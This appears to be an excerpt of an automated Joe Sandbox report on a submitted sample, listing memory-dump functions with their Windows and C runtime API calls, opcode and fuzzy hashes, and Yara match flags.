                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                              • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                              • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                              • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                              APIs
                                                                • Part of subcall function 024AA331: _free.LIBCMT ref: 024AA35A
                                                              • _free.LIBCMT ref: 024AA638
                                                                • Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
                                                                • Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9
                                                              • _free.LIBCMT ref: 024AA643
                                                              • _free.LIBCMT ref: 024AA64E
                                                              • _free.LIBCMT ref: 024AA6A2
                                                              • _free.LIBCMT ref: 024AA6AD
                                                              • _free.LIBCMT ref: 024AA6B8
                                                              • _free.LIBCMT ref: 024AA6C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                              • Instruction ID: 90cb78883c5bddc800448d2ed1f22daa0a4e3ce3442c1cc19a09dbb4cb2cb69a
                                                              • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                              • Instruction Fuzzy Hash: 95115471644B14AEDE30BB73CC65FCF7BAEDF10740F40082EA399AA150E6A5B5148F60
                                                              APIs
                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
                                                              • GetLastError.KERNEL32 ref: 00412406
                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
                                                              • GetLastError.KERNEL32 ref: 0041243D
                                                              • GetLastError.KERNEL32 ref: 0041244F
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                              • String ID:
                                                              • API String ID: 4227777306-0
                                                              • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                              • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                              • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                              • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                              APIs
                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02482667
                                                              • GetLastError.KERNEL32 ref: 0248266D
                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0248269A
                                                              • GetLastError.KERNEL32 ref: 024826A4
                                                              • GetLastError.KERNEL32 ref: 024826B6
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024826CC
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 024826DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                              • String ID:
                                                              • API String ID: 4227777306-0
                                                              • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                              • Instruction ID: 8dc18062fd9b7cdba8f2f580983486f902d54a21e93f80d3fddfda5678792448
                                                              • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                              • Instruction Fuzzy Hash: F001A735511155ABD720FF66EC48FAF3B68AF42F52B50042BF815F2160DBA4D9048AA8
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
                                                              • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
                                                              • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02482507
                                                              • GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
                                                              • GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02482552
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                              • String ID: kernel32.dll
                                                              • API String ID: 4179531150-1793498882
                                                              • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                              • Instruction ID: 6321cb032b3ac6266bcb91948c46b14e9a90c03f5cc25f99a1529d2fb501224a
                                                              • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                              • Instruction Fuzzy Hash: E6F086759103503FB7117B75AD9991F3FEDDD46A22310062BF811E2291EBB585018558
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-3619870194
                                                              • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                              • Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
                                                              • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                              • Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
                                                              APIs
                                                                • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                              • _memcmp.LIBVCRUNTIME ref: 0043116C
                                                              • _free.LIBCMT ref: 004311DD
                                                              • _free.LIBCMT ref: 004311F6
                                                              • _free.LIBCMT ref: 00431228
                                                              • _free.LIBCMT ref: 00431231
                                                              • _free.LIBCMT ref: 0043123D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorLast$_memcmp
                                                              • String ID:
                                                              • API String ID: 4275183328-0
                                                              • Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                              • Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
                                                              • Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
                                                              • Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024A25EC,00000001,00000001,?), ref: 024A23F5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024A25EC,00000001,00000001,?,?,?,?), ref: 024A247B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024A2575
                                                              • __freea.LIBCMT ref: 024A2582
                                                                • Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940
                                                              • __freea.LIBCMT ref: 024A258B
                                                              • __freea.LIBCMT ref: 024A25B0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                              • Instruction ID: 40e7b135655f72d68db524e9ecd5f702624e90b039579bb94eea031907e1d748
                                                              • Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
                                                              • Instruction Fuzzy Hash: CA510472A00216ABDB29CF64CC70EBF77AAFB64714F154A2AFC04D6240DBB4DD41EA50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe
                                                              • String ID:
                                                              • API String ID: 4189289331-0
                                                              • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                              • Instruction ID: b09589567857bce42739b3ca8f4f7854c34ce075a3fd7c49df6bd92b9c8ab05f
                                                              • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                              • Instruction Fuzzy Hash: 8851E732A00205ABDF24DFA98C44BAF7FA9EF49774F14426FE81596281EB31D9418A64
                                                              APIs
                                                              • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02493051
                                                                • Part of subcall function 02488AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02488ABD
                                                              • SafeSQueue.LIBCONCRT ref: 0249306A
                                                              • Concurrency::location::_Assign.LIBCMT ref: 0249312A
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249314B
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02493159
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                              • String ID:
                                                              • API String ID: 3496964030-0
                                                              • Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                              • Instruction ID: f17f68f332ad765b17bc766c602b2384a19cf259f4d76f71caa23b54ebd08521
                                                              • Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
                                                              • Instruction Fuzzy Hash: 9B31FD31A00A119FCF25EF69C884AAEBFB1EF45710F00859ED80A8B291DB70E845CFC0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                              • String ID:
                                                              • API String ID: 1687354797-0
                                                              • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                              • Instruction ID: 3533dc5d6fe9fe7f8d82f7bc90c6bf1722336b93d829ce2b177027cd31e7d937
                                                              • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                              • Instruction Fuzzy Hash: EE218071C14248AADF15EBB9D844BDEB7F9AF08315F24402FE524B7280DB749A448E75
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A96E0678), ref: 00428DE8
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                              • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,A96E0678), ref: 00428E61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                              • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                              • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                              • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 0249904F
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0249905D
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02499076
                                                              • SetLastError.KERNEL32(00000000,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 024990C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                              • Instruction ID: 79e7b528f51af78aa9cb549d269dbed359ca619351dc98132f4f19895471d8bc
                                                              • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                              • Instruction Fuzzy Hash: 3201A7322097216EBF242BB6BC88A6B2F55EB06776B30033FF530453E1EF1288555D99
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                              • int.LIBCPMT ref: 00404D7A
                                                                • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                              • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                              • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                              • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                              • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                              • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02474FCA
                                                              • int.LIBCPMT ref: 02474FE1
                                                                • Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
                                                                • Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE
                                                              • std::locale::_Getfacet.LIBCPMT ref: 02474FEA
                                                              • std::_Facet_Register.LIBCPMT ref: 0247501B
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02475031
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0247504F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                              • Instruction ID: c6852b834db11fb5e4047f026c8ffd8bac5ebc5a9f69090eb6e9b8e97eec28b3
                                                              • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                              • Instruction Fuzzy Hash: 3E11AC319002289BCB25EBA5D844AEE77B6AF04714F54055FE832AB290DB749A068FE0
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                              • int.LIBCPMT ref: 004054FA
                                                                • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                              • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                              • std::_Facet_Register.LIBCPMT ref: 00405534
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                              • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                              • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                              • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                              • int.LIBCPMT ref: 00405596
                                                                • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                              • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                              • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                              • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                              • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                              • int.LIBCPMT ref: 00404C3C
                                                                • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                              • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                              • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                              • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                              • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                              • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0247C401
                                                              • int.LIBCPMT ref: 0247C418
                                                                • Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
                                                                • Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE
                                                              • std::locale::_Getfacet.LIBCPMT ref: 0247C421
                                                              • std::_Facet_Register.LIBCPMT ref: 0247C452
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0247C468
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0247C486
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                              • Instruction ID: 7fde380ba2433709925aa48cbce426dcd8f5b3fb0bad4bf98aea0e4913c3a21a
                                                              • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                              • Instruction Fuzzy Hash: 5811A1719002289BCF15FBA5D884AEE7B76AF45714F14052FE821BB290DF749A05CFA4
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 02474E8C
                                                              • int.LIBCPMT ref: 02474EA3
                                                                • Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
                                                                • Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE
                                                              • std::locale::_Getfacet.LIBCPMT ref: 02474EAC
                                                              • std::_Facet_Register.LIBCPMT ref: 02474EDD
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02474EF3
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02474F11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                              • String ID:
                                                              • API String ID: 2243866535-0
                                                              • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                              • Instruction ID: 5cec8dc9ef8baebea86ba37eeaa29eb09289fa26feddf74ed473df9f2c5ccc89
                                                              • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                              • Instruction Fuzzy Hash: 4A11A131D00229DBCF15EBA5D844AEE77B6AF44724F14051FE421BB2A0DF749A05CFA5
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                              • __Getcoll.LIBCPMT ref: 00404EC4
                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                              • String ID: fJ@
                                                              • API String ID: 1836011271-3478227103
                                                              • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                              • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                              • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
